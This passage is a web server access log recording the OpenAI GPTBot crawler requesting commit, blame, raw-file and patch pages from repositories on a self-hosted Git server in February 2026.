192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" +[17/Feb/2026:13:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 14728] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 7502] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 9839] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" +[17/Feb/2026:13:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" +[17/Feb/2026:13:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" +[17/Feb/2026:13:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 9914] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" +[17/Feb/2026:13:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" +[17/Feb/2026:13:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9508] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12907] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" +[17/Feb/2026:13:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12938] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" +[17/Feb/2026:13:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9857] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" +[17/Feb/2026:13:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" +[17/Feb/2026:13:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 10922] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" +[17/Feb/2026:13:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 22444] [Gzip 10.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" +[17/Feb/2026:13:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" +[17/Feb/2026:13:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" +[17/Feb/2026:13:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" +[17/Feb/2026:13:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" +[17/Feb/2026:13:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 14229] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 14743] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 15330] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 10107] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" +[17/Feb/2026:13:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 15169] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 10086] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:13:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 11528] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 11499] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" +[17/Feb/2026:13:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 12716] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity" [Client 74.7.227.38] [Length 8364] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:13:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects" [Client 74.7.227.38] [Length 7755] [Gzip 2.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:13:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/releases" [Client 74.7.227.38] [Length 7404] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:13:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 10985] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 11394] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" +[17/Feb/2026:13:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 7492] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/branches" [Client 74.7.227.38] [Length 10353] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/watchers" [Client 74.7.227.38] [Length 7727] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:13:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" +[17/Feb/2026:13:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" +[17/Feb/2026:13:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 12416] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" +[17/Feb/2026:13:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" +[17/Feb/2026:13:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/releases.rss" [Client 74.7.227.38] [Length 352] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/releases" +[17/Feb/2026:13:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" +[17/Feb/2026:13:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 10893] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:13:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 19735] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:13:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 9996] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" +[17/Feb/2026:13:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 9920] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" +[17/Feb/2026:13:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:13:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03.diff" [Client 74.7.227.38] [Length 16885] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03.patch" [Client 74.7.227.38] [Length 17464] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook" [Client 74.7.227.38] [Length 52283] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" +[17/Feb/2026:13:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426.patch" [Client 74.7.227.38] [Length 2419] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones" [Client 74.7.227.38] [Length 8438] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:13:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" +[17/Feb/2026:13:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" +[17/Feb/2026:13:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 22474] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 